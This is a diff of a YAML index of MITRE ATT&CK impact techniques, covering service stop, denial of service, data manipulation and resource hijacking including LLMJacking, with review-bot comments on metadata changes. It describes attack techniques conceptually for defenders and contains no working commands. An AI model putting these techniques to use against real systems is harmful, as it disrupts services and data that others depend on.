+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
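Review bot: the line break between `MSExchangeIS` and `, which will make Exchange content inaccessible` sits inside the double-quoted `description` scalar, so it folds to a single space and the parsed text reads "MSExchangeIS , which" with a space before the comma; the removed side had the same break, so confirm the upstream STIX text actually contains it (possibly residue of stripped markup) rather than carrying it forward silently. Moving "(Citation: Novetta Blockbuster)" after the full stop matches the citation placement in the rest of the description and is fine.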
@@ -68780,10 +69535,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -68794,9 +69553,32 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests:
- name: Linux - Stop service using systemctl
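Review bot: `spec_version: '2.1'` is dropped from T1489 here (and from every other technique object in this patch) while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0 and `type`, `id`, `created` and `object_marking_refs` are added; before merging, confirm that nothing consuming this index requires the STIX `spec_version` property, since each object now carries the ATT&CK spec version but no STIX spec version. The `mitre-attack` external reference also now lists `url` before `external_id`; harmless, but it is part of why this object shows as almost entirely rewritten instead of as a few field edits.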
@@ -68903,32 +69685,7 @@ impact:
elevation_required: true
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
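Review bot: T1499.004 loses Azure AD, Office 365, SaaS and Google Workspace from `x_mitre_platforms`, and the replacement list added further down in this object is Windows, IaaS, Linux, macOS only. Elsewhere in this patch Office 365 and Google Workspace are replaced by `Office Suite` (T1657, T1531) rather than removed outright, so it is worth checking against the upstream T1499.004 object that dropping SaaS and the office platforms with no replacement is intended and not a side effect of the platform rename.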
@@ -68946,13 +69703,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -68960,36 +69724,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
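Review bot: `Cid, D..` in the Sucuri BIND9 reference keeps a doubled period from the removed line; if this index is regenerated from the upstream ATT&CK STIX, leave it to match the source, otherwise fix it once here. This hunk also deletes the head of T1565.003 and re-adds it below the T1499.004 tail, so the two objects' keys are interleaved in the diff; the only substantive changes are the bumped `modified` timestamps and the key reordering.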
@@ -68998,11 +69753,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -69011,17 +69772,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
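Review bot: `x_mitre_permissions_required` (User, Administrator, root, SYSTEM) is removed from T1565.003 with nothing replacing it; check that no index or report generator reads that key before dropping it. The FireEye APT38 reference URL changes from content.fireeye.com to the mandiant.com PDF, which is a real content change rather than a reorder and should be called out in the commit message.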
@@ -69030,6 +69805,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -69045,17 +69821,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
@@ -69065,14 +69836,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -69081,28 +69853,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
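Review bot: the reference entries here are reordered rather than changed (the new order follows the `description` text: Cisco, Cloudflare, Marek Majkowsk, Philippe Alcoy), but the `+` lines carry two upstream typos, `Majkowsk` for Majkowski and, in the unchanged context just above, `amplificaiton`; like the other citation text these come from the ATT&CK data and should be fixed upstream, not in this index.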
@@ -69113,7 +69885,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -69124,17 +69895,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -69171,7 +69937,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -69192,7 +69959,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
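Review bot: the `modified` timestamp for T1491 goes backwards, from 2022-05-11T14:00:00.188Z to 2022-03-25T19:34:42.056Z; the same regression appears for T1491.001 (2022-11-08 to 2022-07-28) and T1486 (2022-11-08 to 2022-06-16) later in the patch. Objects whose `modified` moves earlier were presumably rebuilt from a different upstream snapshot than the ones bumped to October 2024; confirm the source bundle is a single current release rather than a mix before merging.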
@@ -69219,12 +69986,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
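Review bot: the new T1496.002 (Bandwidth Hijacking) object is inserted between T1491 and T1657, while its siblings T1496.004 and T1496.001 are added after T1491.001 further down, so the T1496 sub-techniques end up scattered through the impact section instead of next to T1496 itself; if the generator's ordering is not meant to be stable, sorting by technique id would make future diffs reviewable. The object ships with `x_mitre_detection: ''` and `atomic_tests: []`, which matches the other newly added sub-techniques.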
@@ -69257,7 +70090,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -69267,10 +70100,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
@@ -69333,7 +70165,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -69374,7 +70205,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -69395,9 +70226,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
